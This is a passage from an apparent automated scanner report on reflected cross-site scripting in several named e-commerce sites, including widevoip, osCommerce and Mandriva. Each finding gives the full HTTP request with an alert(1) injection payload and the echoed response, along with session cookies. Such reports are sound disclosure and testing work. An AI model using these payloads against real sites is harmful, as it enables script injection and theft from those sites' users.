<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/modules5da4c'-alert(1)-'03985f41b86/blockcart/blockcart-set-collapse.php?ajax_blockcart_display=expand&amp;rand=1305473193548', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.28. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /modules/blockcart/blockcart-set-collapse.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f822'-alert(1)-'980798d9648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/blockcart7f822'-alert(1)-'980798d9648/blockcart-set-collapse.php?ajax_blockcart_display=expand&rand=1305473193548 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:31:55 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/modules/blockcart7f822'-alert(1)-'980798d9648/blockcart-set-collapse.php?ajax_blockcart_display=expand&amp;rand=1305473193548', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.29. https://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /modules/blockcart/blockcart-set-collapse.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4da3'-alert(1)-'3d4cd63b528 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/blockcart/blockcart-set-collapse.phpc4da3'-alert(1)-'3d4cd63b528?ajax_blockcart_display=expand&rand=1305473193548 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DxCL3WawnAVg%3DgU1t2cjcXek%3D3DVf7c5e2HA%3DhjdJFbhNQ0k%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:32:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 16070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/modules/blockcart/blockcart-set-collapse.phpc4da3'-alert(1)-'3d4cd63b528?ajax_blockcart_display=expand&amp;rand=1305473193548', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.30. https://shop.widevoip.com/order.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /order.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ebf3'-alert(1)-'989b9edb336 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /order.php6ebf3'-alert(1)-'989b9edb336?step=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:33:01 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/order.php6ebf3'-alert(1)-'989b9edb336?step=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.31. https://shop.widevoip.com/order.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /order.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fba44'-alert(1)-'92ed8ffb93c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /order.php?st/fba44'-alert(1)-'92ed8ffb93cep=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:31:07 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 22762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/order.php?st/fba44'-alert(1)-'92ed8ffb93cep=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.32. https://shop.widevoip.com/order.php [step parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /order.php

Issue detail

The value of the step request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3564'-alert(1)-'7235c17c5e2 was submitted in the step parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /order.php?step=b3564'-alert(1)-'7235c17c5e2 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:27:39 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 22784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/order.php?step=b3564'-alert(1)-'7235c17c5e2', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.33. https://shop.widevoip.com/prices-drop.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /prices-drop.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd069'-alert(1)-'38a4fe86abd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /prices-drop.phpbd069'-alert(1)-'38a4fe86abd HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:30:56 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 17198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP</title>
       <meta ht
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/prices-drop.phpbd069'-alert(1)-'38a4fe86abd', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.34. https://shop.widevoip.com/prices-drop.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.widevoip.com
Path:   /prices-drop.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85341'-alert(1)-'2eed22d8f74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /prices-drop.php?85341'-alert(1)-'2eed22d8f74=1 HTTP/1.1
Host: shop.widevoip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://shop.widevoip.com/index.php/index.php
Cookie: 41ed22ecf5cb59c06d949492ac805a04=UKED%2FgLhlJw%3DdmQVWcNa39A%3DlenBUVuFZyk%3DRSnM4KTCFTs%3DmhLuDpazsbg%3DT6zjFnyIKgw%3D7EDKWcVgQh8%3DdYIGhRVIl18%3DVl6uLPguJfk%3DB6ZWK%2BGeBsU%3DhqnVHNXfOq0%3DDNYPxktVYKQ%3D%2FyM5fQxMLgY%3D5akioyfipcA%3DDOg9mXnF7G0%3DrRcQQCJzx5A%3DWvK9qhLYguU%3Dv%2BJlLMi4mqs%3DQ1c2A99bBVM%3D4trpz3Fyq6w%3DvUCdZwdXaeE%3D

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:28:22 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 42878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
   <head>
       <title>WideVOIP - Promotions</titl
...[SNIP]...
<script type="text/javascript">writeBookmarkLink('http://shop.widevoip.com/prices-drop.php?85341'-alert(1)-'2eed22d8f74=1', 'WideVOIP', 'favoris');</script>
...[SNIP]...

3.35. http://shops.oscommerce.com/live_shops_frameset_header.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.oscommerce.com
Path:   /live_shops_frameset_header.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e85"><script>alert(1)</script>fbac2c01b52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /live_shops_frameset_header.php?url=http://printingcanvas.co/62e85"><script>alert(1)</script>fbac2c01b52.uk/ HTTP/1.1
Host: shops.oscommerce.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,21173
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231096321.1305467786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); session_id=04312bf650bb8c4cb465ccf73be3ae4d; __unam=e29daef-12ff3f28215-504ba932-1; __utma=231096321.966955857.1305467786.1305467786.1305467786.1; __utmc=231096321; __utmb=231096321.7.10.1305467786; __utmz=113864261.1305467920.1.1.utmcsr=oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113864261.57877410.1305467920.1305467920.1305467920.1; __utmc=113864261; __utmb=113864261.1.10.1305467920

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:00:58 GMT
Server: Apache/2.2.17
Content-Length: 1234
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>

<title>osCommerce, Open Source E-Commerce Solutions</title>

<base href="http://www.oscommerce.com/">

<style type="text
...[SNIP]...
<a href="mailto:hpdl@oscommerce.com?subject=Bad Site: http://printingcanvas.co/62e85"><script>alert(1)</script>fbac2c01b52.uk/">
...[SNIP]...

3.36. http://shops.oscommerce.com/live_shops_frameset_header.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shops.oscommerce.com
Path:   /live_shops_frameset_header.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a93c"><script>alert(1)</script>9c6c852bf29 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /live_shops_frameset_header.php?url=http://printingcanvas.co.uk/7a93c"><script>alert(1)</script>9c6c852bf29 HTTP/1.1
Host: shops.oscommerce.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,21173
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=231096321.1305467786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); session_id=04312bf650bb8c4cb465ccf73be3ae4d; __unam=e29daef-12ff3f28215-504ba932-1; __utma=231096321.966955857.1305467786.1305467786.1305467786.1; __utmc=231096321; __utmb=231096321.7.10.1305467786; __utmz=113864261.1305467920.1.1.utmcsr=oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113864261.57877410.1305467920.1305467920.1305467920.1; __utmc=113864261; __utmb=113864261.1.10.1305467920

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:00:25 GMT
Server: Apache/2.2.17
Content-Length: 1232
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>

<title>osCommerce, Open Source E-Commerce Solutions</title>

<base href="http://www.oscommerce.com/">

<style type="text
...[SNIP]...
<a href="mailto:hpdl@oscommerce.com?subject=Bad Site: http://printingcanvas.co.uk/7a93c"><script>alert(1)</script>9c6c852bf29">
...[SNIP]...

3.37. http://store.mandriva.com/ [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93eb"><script>alert(1)</script>6b83a8f7561 was submitted in the action parameter. This input was echoed as c93eb\"><script>alert(1)</script>6b83a8f7561 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=buy_nowc93eb"><script>alert(1)</script>6b83a8f7561&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:29:33 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13815

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <meta name="verify-v1" content="0fEbSr6Xb4TWnbDkESAq/WBiiZHhQjCaPpyp4egW
...[SNIP]...
<a href="index.php?action=buy_nowc93eb\"><script>alert(1)</script>6b83a8f7561&products_id=495&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.38. http://store.mandriva.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af4a"><script>alert(1)</script>8d27ed95a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1af4a"><script>alert(1)</script>8d27ed95a34=1 HTTP/1.1
Host: store.mandriva.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,26271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:08 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Set-Cookie: osCsid=4a1b45ead74e830845bca35b915c2bb9; path=/; domain=store.mandriva.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16472

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <meta name="verify-v1" content="0fEbSr6Xb4TWnbDkESAq/WBiiZHhQjCaPpyp4egW
...[SNIP]...
<a href="index.php?1af4a"><script>alert(1)</script>8d27ed95a34=1&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.39. http://store.mandriva.com/product_info.php [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a71"><script>alert(1)</script>b9f1f9d6353d18760 was submitted in the action parameter. This input was echoed as 70a71\"><script>alert(1)</script>b9f1f9d6353d18760 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /product_info.php?products_id=495&action=add_product70a71"><script>alert(1)</script>b9f1f9d6353d18760&id%5B24%5D=88&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/product_info.php?products_id=495
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.2.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:31:50 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14037

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a href="product_info.php?products_id=495&action=add_product70a71\"><script>alert(1)</script>b9f1f9d6353d18760&id=Array&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.40. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

